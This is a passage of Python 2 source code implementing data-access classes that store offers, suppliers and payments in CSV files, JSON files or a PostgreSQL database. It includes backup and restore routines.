int(offer_dic['online_end_date'].split('-')[2])),\n datetime.date(int(offer_dic['expiration_date'].split('-')[0]),\n int(offer_dic['expiration_date'].split('-')[1]),\n int(offer_dic['expiration_date'].split('-')[2])),\n self._create_payment_type_from_string_(offer_dic['payment_type']),\n PaymentMethod(offer_dic['payment_method'].split('-', 1)[0].strip(),\n offer_dic['payment_method'].split('-', 1)[1].strip()), offer_dic['scout'],\n offer_dic['include_in_commercial_report'], offer_dic['include_in_payments_report'])\n\n offer.sub_offers = map(lambda x: self._create_sub_offer_from_dictionary_(offer, x), offer_dic['sub_offers'])\n\n return offer\n\n def create_supplier_from_dictionary(self, supplier_dic):\n return Supplier(supplier_dic['id'], supplier_dic['name'],\n map(lambda x: PaymentMethod(x.split('-', 1)[0].strip(), x.split('-', 1)[1].strip()),\n supplier_dic['payment_methods']),\n self._create_payment_type_from_string_(supplier_dic['default_payment_type']))\n\n def full_back_up(self):\n raise NotImplementedError('Method not implemented')\n\n @property\n def available_back_ups(self):\n raise NotImplementedError('Method not implemented')\n\n def recover_back_up(self, timestamp_string, back_up_current_data=True):\n raise NotImplementedError('Method not implemented')\n\n def persist_offer(self, persist_offer):\n raise NotImplementedError('Method not implemented')\n\n def persist_offers(self, persist_offers):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_all_offers(self, payments_data=True):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_offers(self, filter_offer):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_offer_by_id(self, offer_id):\n raise NotImplementedError('Method not implemented')\n\n def delete_offers(self, filter_offer):\n raise NotImplementedError('Method not implemented')\n\n def delete_offer_by_id(self, offer_id):\n raise NotImplementedError('Method not implemented')\n\n def persist_supplier(self, persist_supplier):\n raise NotImplementedError('Method not implemented')\n\n @property\n def retrieve_all_suppliers(self):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_suppliers(self, filter_supplier):\n raise NotImplementedError('Method not implemented')\n\n def retrieve_supplier_by_id(self, id):\n raise NotImplementedError('Method not implemented')\n\n def delete_suppliers(self, supplier_offer):\n raise NotImplementedError('Method not implemented')\n\n def delete_supplier_by_id(self, supplier_id):\n raise NotImplementedError('Method not implemented')\n\nimport csv\nimport shutil\n\n\nclass DaoCSV(DaoAbstract):\n type = 'CSV'\n files_path = '../../../../data/'\n offers_file = 'offers.csv'\n offers_field_names = ['offerId', 'product', 'supplier', 'date', 'onlineEndDate', 'expirationDate', 'paymentType',\n 'paymentMethod', 'paymentData', 'includeInCommercialReport', 'includeInPaymentsReport',\n 'subOfferId', 'price', 'sold', 'exchanged', 'cancelled', 'commission', 'scout']\n suppliers_file = 'suppliers.csv'\n suppliers_field_names = ['Id', 'name', 'defaultPaymentType', 'paymentMethod', 'paymentData']\n payments_file = 'payments.csv'\n payments_field_names = ['offerId', 'subOfferId', 'Id', 'originalAmount', 'amount', 'date', 'paymentMethod',\n 'paymentData', 'paymentType', 'description', 'status']\n files_path_bkp = '../../../../data/bkps/'\n offers_file_bkp = 'offers_{0}.csv'\n suppliers_file_bkp = 'suppliers_{0}.csv'\n payments_file_bkp = 'payments_{0}.csv'\n\n def __init__(self, files_path='../../../../data/'):\n self.files_path = files_path\n self.offers_file = files_path + self.offers_file\n self.suppliers_file = files_path + self.suppliers_file\n self.payments_file = files_path + self.payments_file\n self.files_path_bkp = '{0}bkps/'.format(files_path)\n self.offers_file_bkp = self.files_path_bkp + self.offers_file_bkp\n self.suppliers_file_bkp = self.files_path_bkp + self.suppliers_file_bkp\n self.payments_file_bkp = self.files_path_bkp + self.payments_file_bkp\n return\n\n def full_back_up(self):\n now = str(datetime.datetime.now()).replace('-', '').replace(':', '').replace('.', '').replace(' ', '')\n shutil.copyfile(self.offers_file, self.offers_file_bkp.format(now))\n shutil.copyfile(self.suppliers_file, self.suppliers_file_bkp.format(now))\n shutil.copyfile(self.payments_file, self.payments_file_bkp.format(now))\n return\n\n @staticmethod\n def _create_dict_reader_(file, fields):\n return csv.DictReader(file, lineterminator='\\n', escapechar='\\\\', fieldnames=fields)\n\n @staticmethod\n def _create_dict_writer_(file, fields):\n return csv.DictWriter(file, lineterminator='\\n', escapechar='\\\\', fieldnames=fields)\n\n def _offer_payments_as_dictionaries_(self, offer):\n dictionaries = []\n for sub_offer in offer.sub_offers:\n for payment in sub_offer.payments:\n dictionary = {}\n for header in self.payments_field_names:\n if header == 'offerId':\n dictionary[header] = str(offer.id)\n if header == 'subOfferId':\n if payment.sub_offer is not None:\n dictionary[header] = str(payment.sub_offer.id)\n else:\n dictionary[header] = ''\n if header == 'Id':\n dictionary[header] = str(payment.id)\n if header == 'originalAmount':\n dictionary[header] = str(payment.original_amount)\n if header == 'amount':\n dictionary[header] = str(payment.amount)\n if header == 'date':\n dictionary[header] = str(payment.date)\n if header == 'paymentMethod':\n dictionary[header] = payment.payment_method.method\n if header == 'paymentData':\n dictionary[header] = payment.payment_method.data\n if header == 'paymentType':\n if payment.payment_type is not None:\n dictionary[header] = payment.payment_type.name\n else:\n dictionary[header] = ''\n if header == 'description':\n dictionary[header] = str(payment.description)\n if header == 'status':\n dictionary[header] = str(payment.status)\n dictionaries.append(dictionary)\n return dictionaries\n\n def _persist_offer_payments_(self, offer):\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n rows = {}\n for row in payments_reader:\n if int(row['offerId']) not in rows.keys():\n rows[int(row['offerId'])] = [row]\n else:\n rows[int(row['offerId'])].append(row)\n\n payments_file.close()\n\n payments_file = open(self.payments_file, 'w')\n payments_writer = self._create_dict_writer_(payments_file, self.payments_field_names)\n payments_writer.writeheader()\n for offer_id in rows.keys():\n if offer_id != offer.id:\n payments_writer.writerows(rows[offer_id])\n payments_writer.writerows(self._offer_payments_as_dictionaries_(offer))\n payments_file.close()\n\n def _persist_offers_payments_(self, offers):\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n rows = {}\n for row in payments_reader:\n if int(row['offerId']) not in rows.keys():\n rows[int(row['offerId'])] = [row]\n else:\n rows[int(row['offerId'])].append(row)\n\n payments_file.close()\n\n payments_file = open(self.payments_file, 'w')\n payments_writer = self._create_dict_writer_(payments_file, self.payments_field_names)\n payments_writer.writeheader()\n for offer_id in rows.keys():\n if offer_id not in map(lambda x: x.id, offers):\n payments_writer.writerows(rows[offer_id])\n for offer in offers:\n payments_writer.writerows(self._offer_payments_as_dictionaries_(offer))\n payments_file.close()\n\n def _retrieve_offer_payments_(self, offer_id):\n payments = []\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n for row in payments_reader:\n if int(row['offerId']) == offer_id:\n if row['subOfferId'] != '':\n sub_offer_id = row['subOfferId']\n else:\n sub_offer_id = '0'\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n payment_type = self._create_payment_type_from_string_(row['paymentType'])\n payments.append(Payment(None, int(sub_offer_id), int(row['Id']), float(row['originalAmount']),\n float(row['amount']), self._str_to_date_(row['date']), payment_method,\n payment_type, row['description'], row['status']))\n return payments\n\n def _delete_offer_payments_(self, delete_offer):\n payments_file = open(self.payments_file, 'rU')\n payments_reader = self._create_dict_reader_(payments_file, self.payments_field_names)\n # skip headers\n payments_reader.next()\n rows = {}\n for row in payments_reader:\n if int(row['offerId']) not in rows.keys():\n rows[int(row['offerId'])] = [row]\n else:\n rows[int(row['offerId'])].append(row)\n\n payments_file.close()\n\n payments_file = open(self.payments_file, 'w')\n payments_writer = self._create_dict_writer_(payments_file, self.payments_field_names)\n payments_writer.writeheader()\n for offer_id in rows.keys():\n if offer_id != delete_offer.id:\n payments_writer.writerows(rows[offer_id])\n payments_file.close()\n return\n\n def _offer_as_dictionaries_(self, offer):\n dictionaries = []\n for sub_offer in offer.sub_offers:\n dictionary = {}\n for header in self.offers_field_names:\n if header == 'offerId':\n dictionary[header] = str(offer.id)\n if header == 'product':\n dictionary[header] = offer.product\n if header == 'supplier':\n if offer.supplier is not None:\n dictionary[header] = str(offer.supplier.id)\n else:\n dictionary[header] = ''\n if header == 'date':\n dictionary[header] = str(offer.date)\n if header == 'onlineEndDate':\n dictionary[header] = str(offer.online_end_date)\n if header == 'expirationDate':\n dictionary[header] = str(offer.expiration_date)\n if header == 'paymentType':\n if offer.payment_type is not None:\n dictionary[header] = offer.payment_type.name\n else:\n dictionary[header] = ''\n if header == 'paymentMethod':\n if offer.payment_method is not None:\n dictionary[header] = offer.payment_method.method\n else:\n dictionary[header] = ''\n if header == 'paymentData':\n if offer.payment_method is not None:\n dictionary[header] = offer.payment_method.data\n else:\n dictionary[header] = ''\n if header == 'includeInCommercialReport':\n dictionary[header] = str(offer.include_in_commercial_report)\n if header == 'includeInPaymentsReport':\n dictionary[header] = str(offer.include_in_payments_report)\n if header == 'subOfferId':\n dictionary[header] = str(sub_offer.id)\n if header == 'price':\n dictionary[header] = str(sub_offer.price)\n if header == 'sold':\n dictionary[header] = str(sub_offer.sold)\n if header == 'exchanged':\n dictionary[header] = str(sub_offer.exchanged)\n if header == 'cancelled':\n dictionary[header] = str(sub_offer.cancelled)\n if header == 'commission':\n dictionary[header] = str(sub_offer.commission)\n if header == 'scout':\n dictionary[header] = offer.scout\n dictionaries.append(dictionary)\n return dictionaries\n\n def persist_offer(self, persist_offer):\n offers = self.retrieve_all_offers()\n offers_file = open(self.offers_file, 'w')\n offers_writer = self._create_dict_writer_(offers_file, self.offers_field_names)\n offers_writer.writeheader()\n for offer in offers:\n if offer != persist_offer:\n offers_writer.writerows(self._offer_as_dictionaries_(offer))\n offers_writer.writerows(self._offer_as_dictionaries_(persist_offer))\n offers_file.close()\n self._persist_offer_payments_(persist_offer)\n\n def persist_offers(self, persist_offers):\n offers = self.retrieve_all_offers()\n offers_file = open(self.offers_file, 'w')\n offers_writer = self._create_dict_writer_(offers_file, self.offers_field_names)\n offers_writer.writeheader()\n for offer in offers:\n if offer not in persist_offers:\n offers_writer.writerows(self._offer_as_dictionaries_(offer))\n for new_offer in persist_offers:\n offers_writer.writerows(self._offer_as_dictionaries_(new_offer))\n offers_file.close()\n self._persist_offers_payments_(persist_offers)\n\n def retrieve_all_offers(self, payments_data=True):\n offers = []\n offers_file = open(self.offers_file, 'rU')\n offers_reader = self._create_dict_reader_(offers_file, self.offers_field_names)\n # skip header\n offers_reader.next()\n for row in offers_reader:\n id = int(row['offerId'])\n if len(filter(lambda x: x.id == id, offers)) == 0:\n if row['supplier'] != '':\n supplier = self.retrieve_supplier_by_id(int(row['supplier']))\n else:\n supplier = None\n payment_type = self._create_payment_type_from_string_(row['paymentType'])\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n\n offer = Offer(id, [], row['product'], supplier, self._str_to_date_(row['date']),\n self._str_to_date_(row['onlineEndDate']), self._str_to_date_(row['expirationDate']),\n payment_type, payment_method, row['scout'],\n self._str_to_bool_(row['includeInCommercialReport']),\n self._str_to_bool_(row['includeInPaymentsReport']))\n\n sub_offer = SubOffer(offer, int(row['subOfferId']), float(row['price']), int(row['sold']),\n int(row['exchanged']), int(row['cancelled']), float(row['commission']), [])\n offer.sub_offers = [sub_offer]\n\n offers.append(offer)\n else:\n offer = filter(lambda x: x.id == id, offers)[0]\n sub_offer = SubOffer(offer, int(row['subOfferId']), float(row['price']), int(row['sold']),\n int(row['exchanged']), int(row['cancelled']), float(row['commission']), [])\n offer.sub_offers.append(sub_offer)\n\n offers_file.close()\n\n if payments_data:\n for offer in offers:\n offer.add_payments(self._retrieve_offer_payments_(offer.id))\n\n return offers\n\n def retrieve_offers(self, filter_offer):\n return filter(lambda x: x.filter_from_template(filter_offer), self.retrieve_all_offers())\n\n def retrieve_offer_by_id(self, offer_id):\n offers = self.retrieve_all_offers()\n if len(filter(lambda x: x.id == offer_id, offers)) > 0:\n return filter(lambda x: x.id == offer_id, offers)[0]\n else:\n return None\n\n def _delete_offer_(self, delete_offer):\n offers = self.retrieve_all_offers()\n offers_file = open(self.offers_file, 'w')\n offers_writer = self._create_dict_writer_(offers_file, self.offers_field_names)\n offers_writer.writeheader()\n for offer in offers:\n if offer != delete_offer:\n offers_writer.writerows(self._offer_as_dictionaries_(offer))\n offers_file.close()\n self._delete_offer_payments_(delete_offer)\n return\n\n def delete_offers(self, filter_offer):\n for offer in filter(lambda x: x.filter_from_template(filter_offer), self.retrieve_all_offers()):\n self._delete_offer_(offer)\n return\n\n def delete_offer_by_id(self, offer_id):\n for offer in filter(lambda x: x.id == offer_id, self.retrieve_all_offers()):\n self._delete_offer_(offer)\n return\n\n def _supplier_as_dictionaries_(self, supplier):\n dictionaries = []\n for payment_method in supplier.payment_methods:\n dictionary = {}\n for header in self.suppliers_field_names:\n if header == 'Id':\n dictionary[header] = str(supplier.id)\n if header == 'name':\n dictionary[header] = supplier.name\n if header == 'defaultPaymentType':\n if supplier.default_payment_type is not None:\n dictionary[header] = str(supplier.default_payment_type.name)\n else:\n dictionary[header] = ''\n if header == 'paymentMethod':\n dictionary[header] = str(payment_method.method)\n if header == 'paymentData':\n dictionary[header] = str(payment_method.data)\n dictionaries.append(dictionary)\n return dictionaries\n\n def persist_supplier(self, persist_supplier):\n suppliers = self.retrieve_all_suppliers\n suppliers_file = open(self.suppliers_file, 'w')\n suppliers_writer = self._create_dict_writer_(suppliers_file, self.suppliers_field_names)\n suppliers_writer.writeheader()\n for supplier in suppliers:\n if supplier != persist_supplier:\n suppliers_writer.writerows(self._supplier_as_dictionaries_(supplier))\n suppliers_writer.writerows(self._supplier_as_dictionaries_(persist_supplier))\n suppliers_file.close()\n return\n\n @property\n def retrieve_all_suppliers(self):\n suppliers = []\n suppliers_file = open(self.suppliers_file, 'rU')\n suppliers_reader = self._create_dict_reader_(suppliers_file, self.suppliers_field_names)\n # skip header\n suppliers_reader.next()\n for row in suppliers_reader:\n id = int(row['Id'])\n if len(filter(lambda x: x.id == id, suppliers)) == 0:\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n if row['defaultPaymentType'] != '':\n default_payment_type = self._create_payment_type_from_string_(row['defaultPaymentType'])\n else:\n default_payment_type = None\n supplier = Supplier(id, row['name'], [payment_method], default_payment_type)\n\n suppliers.append(supplier)\n else:\n supplier = filter(lambda x: x.id == id, suppliers)[0]\n payment_method = PaymentMethod(row['paymentMethod'], row['paymentData'])\n supplier.payment_methods.append(payment_method)\n\n suppliers_file.close()\n\n return suppliers\n\n def retrieve_suppliers(self, filter_supplier):\n return filter(lambda x: x.filter_from_template(filter_supplier), self.retrieve_all_suppliers)\n\n def retrieve_supplier_by_id(self, id):\n suppliers = self.retrieve_all_suppliers\n if len(filter(lambda x: x.id == id, suppliers)) > 0:\n return filter(lambda x: x.id == id, suppliers)[0]\n else:\n return None\n\n def _delete_supplier_(self, delete_supplier):\n suppliers = self.retrieve_all_suppliers\n suppliers_file = open(self.suppliers_file, 'w')\n suppliers_writer = self._create_dict_writer_(suppliers_file, self.suppliers_field_names)\n suppliers_writer.writeheader()\n for supplier in suppliers:\n if supplier != delete_supplier:\n suppliers_writer.writerows(self._supplier_as_dictionaries_(supplier))\n suppliers_file.close()\n return\n\n def delete_suppliers(self, fiter_supplier):\n for supplier in filter(lambda x: x.filter_from_template(fiter_supplier), self.retrieve_all_suppliers):\n self._delete_supplier_(supplier)\n return\n\n def delete_supplier_by_id(self, supplier_id):\n for supplier in filter(lambda x: x.id == supplier_id, self.retrieve_all_suppliers):\n self._delete_supplier_(supplier)\n return\n\n\nimport codecs\nimport json\nimport glob\nimport re\n\n\nclass DaoJSON(DaoAbstract):\n type = 'JSON'\n files_path = '../../../../data/'\n offers_file = 'offers.json'\n suppliers_file = 'suppliers.json'\n payments_file = 'payments.json'\n files_path_bkp = '../../../../data/bkps/'\n offers_file_bkp = 'offers_{0}.json'\n suppliers_file_bkp = 'suppliers_{0}.json'\n payments_file_bkp = 'payments_{0}.json'\n\n def __init__(self, files_path='../../../../data/'):\n super(DaoJSON, self).__init__()\n\n self.files_path = files_path\n self.offers_file = files_path + self.offers_file\n self.suppliers_file = files_path + self.suppliers_file\n self.payments_file = files_path + self.payments_file\n self.files_path_bkp = '{0}bkps/'.format(files_path)\n self.offers_file_bkp = self.files_path_bkp + self.offers_file_bkp\n self.suppliers_file_bkp = self.files_path_bkp + self.suppliers_file_bkp\n self.payments_file_bkp = self.files_path_bkp + self.payments_file_bkp\n\n def full_back_up(self):\n now = str(datetime.datetime.now()).replace('-', '').replace(':', '').replace('.', '').replace(' ', '')\n shutil.copyfile(self.offers_file, self.offers_file_bkp.format(now))\n shutil.copyfile(self.suppliers_file, self.suppliers_file_bkp.format(now))\n shutil.copyfile(self.payments_file, self.payments_file_bkp.format(now))\n\n @property\n def available_back_ups(self):\n timestamps = []\n for offers_file in glob.glob(self.offers_file_bkp.format('*')):\n datetime_created_string = re.search('([^(0-9)]*)([0-9]+)(.*)', offers_file).group(2)\n datetime_created = datetime.datetime(int(datetime_created_string[0:4]), int(datetime_created_string[4:6]),\n int(datetime_created_string[6:8]), int(datetime_created_string[8:10]),\n int(datetime_created_string[10:12]),\n int(datetime_created_string[12:14]))\n\n timestamps.append({'timestamp': str(datetime_created), 'timestamp_string': datetime_created_string})\n\n return timestamps\n\n def recover_back_up(self, timestamp_string, back_up_current_data=True):\n if back_up_current_data:\n self.full_back_up()\n shutil.copyfile(self.offers_file_bkp.format(timestamp_string), self.offers_file)\n shutil.copyfile(self.suppliers_file_bkp.format(timestamp_string), self.suppliers_file)\n shutil.copyfile(self.payments_file_bkp.format(timestamp_string), self.payments_file)\n\n def _persist_offer_payments_(self, offer):\n payments_dict = filter(lambda x: int(x['offer_id']) != offer.id,\n json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n for sub_offer in offer.sub_offers:\n payments_dict.extend(map(lambda x: x.as_dictionary, sub_offer.payments))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def _persist_offers_payments_(self, offers):\n payments_dict = filter(lambda x: int(x['offer_id']) not in map(lambda x: x.id, offers),\n json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n for offer in offers:\n for sub_offer in offer.sub_offers:\n payments_dict.extend(map(lambda x: x.as_dictionary, sub_offer.payments))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def _retrieve_offer_payments_(self, offer_id):\n payments = []\n payments_dict = json.load(codecs.open(self.payments_file, 'r', 'utf-8'))\n for payment_dict in payments_dict:\n if int(payment_dict['offer_id']) == offer_id:\n if payment_dict['sub_offer_id'] != '':\n sub_offer_id = payment_dict['sub_offer_id']\n else:\n sub_offer_id = '0'\n payment_method = PaymentMethod(payment_dict['payment_method'].split(' - ')[0],\n payment_dict['payment_method'].split(' - ')[1])\n payment_type = self._create_payment_type_from_string_(payment_dict['payment_type'])\n payments.append(Payment(None, int(sub_offer_id), int(payment_dict['id']),\n float(payment_dict['original_amount']), float(payment_dict['amount']),\n self._str_to_date_(payment_dict['date']), payment_method,\n payment_type, payment_dict['description'], payment_dict['status']))\n return payments\n\n def _delete_offer_payments_(self, delete_offer):\n payments_dict = filter(lambda x: int(x['offer_id']) != delete_offer.id,\n json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def _delete_offers_payments_(self, delete_offers):\n payments_dict = filter(lambda x: int(x['offer_id']) not in map(lambda x: x.id, delete_offers),\n json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def persist_offer(self, persist_offer):\n offers = filter(lambda x: x != persist_offer, self.retrieve_all_offers())\n offers.append(persist_offer)\n json.dump(map(lambda x: x.as_dictionary, offers), codecs.open(self.offers_file, 'w', 'utf-8'))\n self._persist_offer_payments_(persist_offer)\n\n def persist_offers(self, persist_offers):\n offers = filter(lambda x: x not in persist_offers, self.retrieve_all_offers())\n offers.extend(persist_offers)\n json.dump(map(lambda x: x.as_dictionary, offers), codecs.open(self.offers_file, 'w', 'utf-8'))\n self._persist_offers_payments_(persist_offers)\n\n def retrieve_all_offers(self, payments_data=True, payments_data_for=None):\n offers = []\n for offer_dict in json.load(codecs.open(self.offers_file, 'r', 'utf-8')):\n id = int(offer_dict['id'])\n if offer_dict['supplier'] != '':\n supplier = self.retrieve_supplier_by_id(int(offer_dict['supplier']['id']))\n else:\n supplier = None\n payment_type = self._create_payment_type_from_string_(offer_dict['payment_type'])\n payment_method = PaymentMethod(offer_dict['payment_method'].split(' - ')[0],\n offer_dict['payment_method'].split(' - ')[1])\n\n offer = Offer(id, [], offer_dict['product'], supplier, self._str_to_date_(offer_dict['date']),\n self._str_to_date_(offer_dict['online_end_date']),\n self._str_to_date_(offer_dict['expiration_date']),\n payment_type, payment_method, offer_dict['scout'],\n offer_dict['include_in_commercial_report'],\n offer_dict['include_in_payments_report'])\n\n for sub_offer_dict in offer_dict['sub_offers']:\n offer.sub_offers.append(SubOffer(offer, int(sub_offer_dict['id']), float(sub_offer_dict['price']),\n int(sub_offer_dict['sold']),\n int(sub_offer_dict['exchanged']),\n int(sub_offer_dict['cancelled']),\n float(sub_offer_dict['commission']), []))\n\n offers.append(offer)\n\n if payments_data:\n for offer in filter(lambda x: payments_data_for is None or x.id in payments_data_for, offers):\n offer.add_payments(self._retrieve_offer_payments_(offer.id))\n\n return offers\n\n def retrieve_offers(self, filter_offer):\n return filter(lambda x: x.filter_from_template(filter_offer), self.retrieve_all_offers())\n\n def retrieve_offer_by_id(self, offer_id):\n offers = self.retrieve_all_offers(payments_data=False)\n if len(filter(lambda x: x.id == offer_id, offers)) > 0:\n return filter(lambda x: x.id == offer_id, self.retrieve_all_offers(payments_data_for=[offer_id]))[0]\n else:\n return None\n\n def _delete_offer_(self, delete_offer):\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: x != delete_offer, self.retrieve_all_offers())),\n codecs.open(self.offers_file, 'w', 'utf-8'))\n self._delete_offer_payments_(delete_offer)\n\n def delete_offers(self, filter_offer):\n offers = self.retrieve_all_offers()\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: not x.filter_from_template(filter_offer), offers)),\n codecs.open(self.offers_file, 'w', 'utf-8'))\n self._delete_offers_payments_(filter(lambda x: x.filter_from_template(filter_offer), offers))\n\n def delete_offer_by_id(self, offer_id):\n for offer in filter(lambda x: x.id == offer_id, self.retrieve_all_offers()):\n self._delete_offer_(offer)\n return\n\n def persist_supplier(self, persist_supplier):\n suppliers = filter(lambda x: x != persist_supplier, self.retrieve_all_suppliers)\n suppliers.append(persist_supplier)\n json.dump(map(lambda x: x.as_dictionary, suppliers), codecs.open(self.suppliers_file, 'w', 'utf-8'))\n\n @property\n def retrieve_all_suppliers(self):\n suppliers = []\n for supplier_dict in json.load(codecs.open(self.suppliers_file, 'r', 'utf-8')):\n id = int(supplier_dict['id'])\n payment_methods = []\n for payment_method_dict in supplier_dict['payment_methods']:\n payment_methods.append(PaymentMethod(payment_method_dict.split(' - ')[0],\n payment_method_dict.split(' - ')[1]))\n\n if supplier_dict['default_payment_type'] != '':\n default_payment_type = self._create_payment_type_from_string_(supplier_dict['default_payment_type'])\n else:\n default_payment_type = None\n\n supplier = Supplier(id, supplier_dict['name'], payment_methods, default_payment_type)\n\n suppliers.append(supplier)\n\n return suppliers\n\n def retrieve_suppliers(self, filter_supplier):\n return filter(lambda x: x.filter_from_template(filter_supplier), self.retrieve_all_suppliers)\n\n def retrieve_supplier_by_id(self, id):\n suppliers = self.retrieve_all_suppliers\n if len(filter(lambda x: x.id == id, suppliers)) > 0:\n return filter(lambda x: x.id == id, suppliers)[0]\n else:\n return None\n\n def _delete_supplier_(self, delete_supplier):\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: x != delete_supplier, self.retrieve_all_suppliers)),\n codecs.open(self.suppliers_file, 'w', 'utf-8'))\n\n def delete_suppliers(self, filter_supplier):\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: not x.filter_from_template(filter_supplier),\n self.retrieve_all_suppliers)),\n codecs.open(self.suppliers_file, 'w', 'utf-8'))\n\n def delete_supplier_by_id(self, supplier_id):\n for supplier in filter(lambda x: x.id == supplier_id, self.retrieve_all_suppliers):\n self._delete_supplier_(supplier)\n return\n\n\nclass DaoPostgre(DaoAbstract):\n type = 'Postgre'\n\n def __init__(self, db_session, engine=None):\n super(DaoPostgre, self).__init__()\n self.session = db_session\n self.engine = engine\n\n def _create_payment_from_dictionary_(self, sub_offer, payment_dict):\n Payment(sub_offer, id=payment_dict['id'], original_amount=payment_dict['original_amount'],\n amount=payment_dict['amount'], date=datetime.strptime(payment_dict['date'], '%Y-%m-%d').date(),\n description=payment_dict['description'], status=payment_dict['status'])\n\n def _create_sub_offer_from_dictionary_(self, offer, sub_offer_dict):\n sub_offer = SubOffer(offer, id=sub_offer_dict['id'], price=sub_offer_dict['price'],sold= sub_offer_dict['sold'],\n exchanged=sub_offer_dict['exchanged'], cancelled=sub_offer_dict['cancelled'],\n commission=sub_offer_dict['commission'])\n\n for payment_dict in sub_offer_dict['payments']:\n self._create_payment_from_dictionary_(sub_offer, payment_dict)\n\n def create_offer_from_dictionary(self, offer_dict):\n supplier = self.retrieve_supplier_by_id(offer_dict['supplier']['id'])\n\n offer = Offer(id=offer_dict['id'], product=offer_dict['product'], supplier=supplier,\n date=datetime.strptime(offer_dict['date'], '%Y-%m-%d').date(),\n online_end_date=datetime.strptime(offer_dict['online_end_date'], '%Y-%m-%d').date(),\n expiration_date=datetime.strptime(offer_dict['expiration_date'], '%Y-%m-%d').date(),\n payment_type_name=offer_dict['payment_type'],\n payment_method=filter(lambda pm: pm.method ==\n offer_dict['payment_method'].split('-', 1)[0].strip() and\n pm.data == offer_dict['payment_method'].split('-', 1)[1]\n .strip(), supplier.payment_methods)[0],\n scout=offer_dict['scout'],\n include_in_commercial_report=offer_dict['include_in_commercial_report'],\n include_in_payments_report=offer_dict['include_in_payments_report'],\n service_fee=float(offer_dict['service_fee'] if offer_dict['service_fee'] is not None else 0.0))\n\n self.session.add(offer)\n\n for sub_offer_dict in offer_dict['sub_offers']:\n self._create_sub_offer_from_dictionary_(offer, sub_offer_dict)\n\n return offer\n\n def create_supplier_from_dictionary(self, supplier_dict):\n supplier = self.session.query(Supplier).filter(Supplier.id == supplier_dict['id']).one_or_none()\n if supplier is None:\n supplier = Supplier(supplier_dict['id'], supplier_dict['name'],\n default_payment_type_name=supplier_dict['default_payment_type'])\n self.session.add(supplier)\n else:\n supplier.name = supplier_dict['name']\n supplier.default_payment_type_name = supplier_dict['default_payment_type']\n\n payment_method_id = 1\n for payment_method in supplier_dict['payment_methods']:\n try:\n pm = sorted(supplier.payment_methods, key=lambda pm: pm.id)[payment_method_id - 1]\n pm.method = payment_method.split(' - ', 1)[0]\n pm.data = payment_method.split(' - ', 1)[1]\n except IndexError:\n PaymentMethod(supplier, method=payment_method.split(' - ', 1)[0],\n data=payment_method.split(' - ', 1)[1])\n finally:\n payment_method_id += 1\n\n warnings_offers_deleted = []\n payment_methods_to_delete = supplier.payment_methods[payment_method_id - 1:]\n for pm in payment_methods_to_delete:\n if len(pm.offers) > 0:\n warnings_offers_deleted.extend(map(lambda o: o.id, pm.offers))\n self.session.delete(pm)\n warnings_offers_deleted = sorted(list(set(warnings_offers_deleted)))\n\n return str(warnings_offers_deleted) if len(warnings_offers_deleted) > 0 else ''\n\n def persist_changes(self):\n self.session.commit()\n\n def retrieve_all_offers(self, payments_data=True, payments_data_for=None):\n if payments_data:\n return list(set(map(lambda r: r.Offer, self.session.query(Offer, SubOffer).join(SubOffer).join(Supplier)\n .options(joinedload(SubOffer.payments), joinedload(Offer.payment_method)).all())))\n else:\n return self.session.query(Offer).join(SubOffer).join(Supplier).options(joinedload(Offer.payment_method))\\\n .all()\n\n def retrieve_offer_by_id(self, offer_id):\n return self.session.query(Offer).filter(Offer.id == int(offer_id)).one_or_none()\n\n def delete_offer(self, offer):\n if offer is not None:\n self.session.delete(offer)\n\n def delete_offer_by_id(self, offer_id):\n self.delete_offer(self.retrieve_offer_by_id(int(offer_id)))\n\n @property\n def retrieve_all_suppliers(self):\n return self.session.query(Supplier).join(PaymentMethod).all()\n\n @property\n def retrieve_first_supplier(self):\n return self.session.query(Supplier).join(PaymentMethod).order_by(Supplier.id).first()\n\n def retrieve_supplier_by_id(self, supplier_id):\n return self.session.query(Supplier).join(PaymentMethod).filter(Supplier.id == int(supplier_id)).one_or_none()\n\n def delete_supplier(self, supplier):\n if supplier is not None:\n self.session.delete(supplier)\n\n def delete_supplier_by_id(self, supplier_id):\n supplier = self.retrieve_supplier_by_id(int(supplier_id))\n warnings_offers_deleted = sorted(list(set(map(lambda o: o.id, supplier.offers))))\n self.delete_supplier(supplier)\n return str(warnings_offers_deleted) if len(warnings_offers_deleted) > 0 else ''\n\n def full_back_up(self):\n connection = self.engine.raw_connection()\n try:\n cursor = connection.cursor()\n cursor.callproc('gru.create_backup', [])\n cursor.close()\n connection.commit()\n finally:\n connection.close()\n\n @property\n def available_back_ups(self):\n connection = self.engine.raw_connection()\n results = []\n try:\n cursor = connection.cursor()\n cursor.execute(\"select distinct substring(table_schema, 5, 1000) from information_schema.tables where \"\n \"table_schema like 'gru_%'\")\n results = cursor.fetchall()\n cursor.close()\n finally:\n connection.close()\n return map(lambda r: {'timestamp': str(datetime.strptime(r[0], '%Y%m%d%H%M%S')), 'timestamp_string': r[0]},\n results)\n\n def recover_back_up(self, timestamp_string, back_up_current_data=True):\n connection = self.engine.raw_connection()\n try:\n if 